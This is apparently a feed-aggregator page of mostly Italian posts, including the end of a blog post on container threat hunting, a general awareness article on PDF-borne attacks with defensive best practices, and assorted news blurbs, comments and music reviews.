Hunting for suspicious container entrypoints

Conclusion


Containerized environments are now part of most organizations’ networks because of the deployment and dependency encapsulation feasibility they provide. However, they are usually overlooked by security teams and decision makers because of a common misunderstanding about container isolation. This results in undesirable situations when these containers are compromised, and the security team is not fully equipped with the knowledge or tools to help during response activities, or even to monitor or detect in the first place.

The approach discussed in this post is one of the procedures that we typically follow in our Compromise Assessment and Incident Response services when we need to hunt for threats in historical host execution logs with container visibility issues. However, in order to detect container-based threats in time, it is crucial to protect your systems with a solid containerization monitoring solution, such as Kaspersky Container Security.


securelist.com/host-based-logs…



Digitale Souveränität: Wie das EU-Parlament Europa unabhängiger machen will


netzpolitik.org/2025/digitale-…



Con grande gioia oggi possiamo festeggiare la sconfitta della società petrolifera Rockhopper che aveva chiesto un risarcimento di 190 milioni di euro all’Italia. Riceveranno 0 euro e non potranno più ricattare la nostra comunità come avevano fatto. Rivendico con orgoglio che siamo riusciti a fermare il devastante progetto di una gigantesca raffineria galleggiante Ombrina 2 [...]


Attacchi informatici tramite PDF: Quali sono i formati più sicuri


I file PDF sono fondamentali nella condivisione dei documenti digitali perché sono comodi e semplici da usare. Però, questa fiducia li ha resi anche un bersaglio facile per i cybercriminali. Secondo i dati recenti, i PDF costituiscono quasi il 30-40% dei file dannosi veicolati via email. Un semplice PDF può nascondere delle minacce sofisticate.

Nell’ambito della cybersecurity, è fondamentale capire come un file apparentemente innocuo possa diventare un’arma. Quali sono gli attacchi noti che hanno sfruttato questo formato? Quali sono le varianti di PDF che risultano più sicure? È buona norma utilizzare degli strumenti affidabili per la gestione dei PDF, come le piattaforme specifiche e sicure con la funzione unisci pdf per combinare i documenti. In questo modo, si riduce il rischio di manipolazioni malevole nelle operazioni più comuni.

In questo articolo, vediamo quali sono le principali tecniche di attacco tramite i PDF, analizziamo dei casi reali e spieghiamo come difendersi considerando i formati PDF più sicuri e le best practice.

Il PDF come vettore di attacco informatico


Il formato PDF è nato per garantire una rappresentazione fedele dei documenti su qualsiasi sistema. Col tempo si è arricchito di tante funzionalità avanzate: oggi un PDF può contenere dei moduli compilabili, degli elementi multimediali, degli oggetti 3D e persino degli script JavaScript. Questa versatilità ha un rovescio della medaglia: ciò che migliora l’esperienza utente può essere sfruttato dai malintenzionati. Un PDF manipolato può eseguire del codice arbitrario sul sistema della vittima sfruttando le vulnerabilità del software lettore. Già alla fine degli anni 2000 ci sono stati degli attacchi di questo tipo: ad esempio l’exploit CVE-2010-1240, diffuso via spam, consentiva di infettare il PC all’apertura del PDF installando un trojan botnet.

Un altro aspetto critico è la percezione di sicurezza che circonda i PDF. Molti utenti li considerano più sicuri di un file eseguibile o di un documento Office con macro, e i PDF spesso eludono anche i filtri antispam più basilari. I criminali sfruttano questa fiducia inviando PDF dall’aspetto legittimo (fatture, contratti, moduli) che in realtà celano dei contenuti pericolosi. Da notare che anche i browser web moderni includono dei visualizzatori PDF integrati: una falla in quei componenti potrebbe essere sfruttata inducendo la vittima a visualizzare un PDF malevolo online, senza nemmeno scaricarlo.

Tecniche di attacco tramite file PDF


Gli aggressori hanno sviluppato varie tecniche per compromettere i sistemi attraverso i file PDF. Di seguito alcune delle più comuni:

  • Script malevoli integrati: Inserire del codice JavaScript in un PDF è uno dei metodi più diffusi. Lo script può essere offuscato nella struttura del documento e può essere programmato per attivarsi all’apertura. Ad esempio, l’exploit CVE-2018-4990 usava uno script e un oggetto immagine predisposto per corrompere la memoria di Adobe Reader ed eseguire codice maligno.
  • Sfruttamento delle vulnerabilità: Molti attacchi PDF puntano sulle falle sconosciute o non ancora risolte nei lettori. Adobe, ad esempio, nel 2021 ha risolto un bug critico (CVE-2021-28550) già sfruttato in diversi attacchi mirati. In questi casi aprire il PDF è sufficiente a infettare il sistema, poiché il file sfrutta un bug del programma per eseguire del codice arbitrario.
  • Phishing tramite PDF: Spesso il PDF funge da veicolo di inganni per l’utente. Un documento può imitare una pagina di login o una comunicazione ufficiale. In questo modo, inducendo la vittima a cliccare i link esterni o a inserire le credenziali. Ad esempio, un PDF può mostrare un finto pulsante “Accedi al documento” che apre un sito di phishing, oppure può includere un codice QR che conduce a una pagina web malevola. Il file supera i filtri email, ma può comunque portare l’utente a compiere delle azioni pericolose.


Casi reali di attacchi tramite PDF


Tra gli incidenti documentati più significativi ci sono questi:

  • 2018: attacco mirato che combinava due exploit 0-day (Adobe Reader CVE-2018-4990 e Windows) per eseguire malware sul sistema bersaglio.
  • 2021: vulnerabilità di Adobe Reader (CVE-2021-28550) sfruttata in attacchi reali prima dell’uscita della patch.
  • 2024: campagna DarkGate in cui dei PDF con dei link offuscati reindirizzavano le vittime su dei siti compromessi. Sfruttavano una falla Windows (CVE-2024-21412) per aggirare SmartScreen e per installare un malware sui sistemi.
  • 2025: PDF con falsi inviti DocuSign hanno innescato dei download di malware. Nello stesso periodo, dei PDF con dei codici QR hanno dirottato gli utenti verso delle false pagine di login Microsoft 365 per rubare le credenziali.


I formati PDF più sicuri e come difendersi


Esistono varianti e impostazioni del PDF che offrono più sicurezza. In ambito professionale si fa spesso riferimento al PDF/A, lo standard ISO pensato per l’archiviazione a lungo termine. Il PDF/A impone delle restrizioni rispetto al PDF standard: ad esempio, vieta i contenuti dinamici (video, audio, script) e privilegia la staticità del documento. Un file conforme a PDF/A non può contenere macro o codice eseguibile nascosto, quindi riduce il rischio di attacchi. Convertire un PDF in PDF/A (o generarlo direttamente così) è una buona pratica quando si condividono i documenti in contesti ad alto rischio. In questo modo, gli eventuali elementi pericolosi vengono eliminati.

Un ulteriore accorgimento è l’uso della firma digitale sui PDF. Un documento firmato digitalmente offre delle garanzie di integrità e di autenticità: qualunque modifica malevola del file ne invaliderebbe la firma e, quindi, segnalerebbe che il contenuto è stato alterato.

Infine, ecco alcune best practice per ridurre i rischi nell’uso dei PDF:

  • Mantenere aggiornati i lettori: Installare sempre le ultime patch di sicurezza per Acrobat, Foxit e gli altri software PDF così da correggere al più presto le vulnerabilità note.
  • Limitare le funzionalità attive: Disabilitare l’esecuzione di JavaScript e di altri contenuti attivi se non strettamente necessari. Questo riduce la possibilità che del codice indesiderato venga eseguito all’apertura dei documenti.
  • Verificare l’origine dei PDF: Trattare con cautela gli allegati non attesi, soprattutto se provenienti da degli account sconosciuti. In ambito aziendale, conviene verificare per vie ufficiali la legittimità di un PDF prima di aprirlo.
  • Usare ambienti isolati: Aprire eventuali PDF sospetti in una sandbox o tramite un visualizzatore online, in modo che il documento non interagisca con il sistema locale e, se è malevolo, i suoi effetti rimangano confinati.
  • Sensibilizzare gli utenti: Formare il personale sul fatto che anche i PDF possono veicolare delle minacce, fornire delle indicazioni per riconoscere i comportamenti anomali e per segnalare le attività sospette.

Con le giuste precauzioni si può continuare a utilizzare i PDF minimizzando i rischi legati agli attacchi informatici.

L'articolo Attacchi informatici tramite PDF: Quali sono i formati più sicuri proviene da il blog della sicurezza informatica.




dobbiamo quantomeno imparare a rispondere alla guerra ibrida russa con altra guerra ibrida. o perlomeno imparare a difenderci.


Cyber security nelle Pmi: nel 2025 navigano ancora a vista, servono più investimenti


@Informatica (Italy e non Italy 😁)
Secondo l'indagine di CrowdStrike sulla cyber security, 9 Pmi su dieci sono consapevoli dei cyber rischi, ma sono limitati gli investimenti in tecnologie evolute. Ciò lascia le aziende esposte ai rischi, soprattutto considerando la presenza



Istanbul, tra dimostrazioni di forza e cauti segnali di dialogo. La prospettiva di Caruso

@Notizie dall'Italia e dal mondo

Il secondo round di colloqui russo-ucraini a Istanbul si è concluso dopo poco più di un’ora con quello che il ministero degli Esteri turco ha definito un risultato “non negativo”. Eppure, dietro questa prudente formulazione diplomatica si nasconde una realtà complessa: mentre le



Crocodilus: l’evoluzione di un trojan bancario Android che minaccia le criptovalute a livello globale


@Informatica (Italy e non Italy 😁)
Nel marzo 2025, il team di Mobile Threat Intelligence di ThreatFabric ha individuato un nuovo trojan bancario per Android denominato Crocodilus. Inizialmente osservato in campagne di test, il malware ha



Così Cina e Pakistan rafforzano la guerra ibrida contro l’India

@Notizie dall'Italia e dal mondo

Il panorama geopolitico dell’Indo-Pacifico si sta rapidamente trasformando in un teatro di minacce ibride, dove attacchi fisici, operazioni cibernetiche e campagne di disinformazione convergono per destabilizzare le nazioni. Questo articolo analizza il contesto strategico delle minacce ibride



reshared this

in reply to simona

Mai capito perché "La Verità" (mai nome fu meno azzeccato) non si ricicli come giornale satirico.
in reply to mrasd2k2

@mrasd2k2 probabilmente c'è chi legge quel nome e pensa che basto il nome per rendere la fonte credibile.


Prontezza operativa e adattamento tattico. Cosa prevede la nuova dottrina strategica britannica

@Notizie dall'Italia e dal mondo

L’ordine internazionale è in fase di transizione e riorganizzazione e ciò obbliga gli Stati europei e la Nato a un riorientamento strategico per la ristrutturazione e la riorganizzazione della propria difesa. La Strategic defence



un radioamatore ha 2 santi: santo ione e santa ionosfera


L’Europa tra difesa possibile e sogno necessario

@Politica interna, europea e internazionale

3 giugno 2025, ore 10:30 – Esperienza Europa – David Sassoli, Piazza Venezia 6C, Roma 70 ANNI DALLA CONFERENZA DI MESSINA. 3 GIUGNO 1955 – 3 GIUGNO 2025 INTERVERRANNO Giuseppe Benedetto, Presidente Fondazione Luigi Einaudi Andrea Cangini, Segretario generale Fondazione Luigi Einaudi Carlo Corazza, Direttore



Vertice di Istanbul: diplomazia o strategia di accerchiamento?


@Notizie dall'Italia e dal mondo
Mentre la Turchia si propone come arbitro neutrale, le dinamiche del vertice mostrano un equilibrio fragile: una ‘pace’ negoziata sotto l’egida occidentale, che rafforza lo scontro strategico invece di risolverlo.
L'articolo Vertice di Istanbul: diplomazia o strategia di



Sacromud with The Cape Horns – The Sun Experience
freezonemagazine.com/articoli/…
L’accoglienza dei loro dischi da parte della stampa (non solo specializzata) e dai fruitori, è inversamente proporzionale alla possibilità di vedere frequentemente dal vivo i Sacromud. Non per una loro idiosincrasia negli spostamenti e nel salire su un palco, tutt’altro, ma inspiegabilmente, per la poca considerazione da parte di Festival, locali, ecc. Il


David Lowery – Fathers, Sons and Brothers
freezonemagazine.com/articoli/…
La storia di molti di coloro che hanno trovato nel Rock una vera e propria passione, dalla quale è impossibile fare a meno, passa dai racconti di quel campionato minore fatto di figure però fondamentali a garantire la nostra felicità, la voglia di vivere, di non privarsi di un piacere che è ineludibile. David Lowery […]
L'articolo David Lowery – Fathers, Sons and Brothers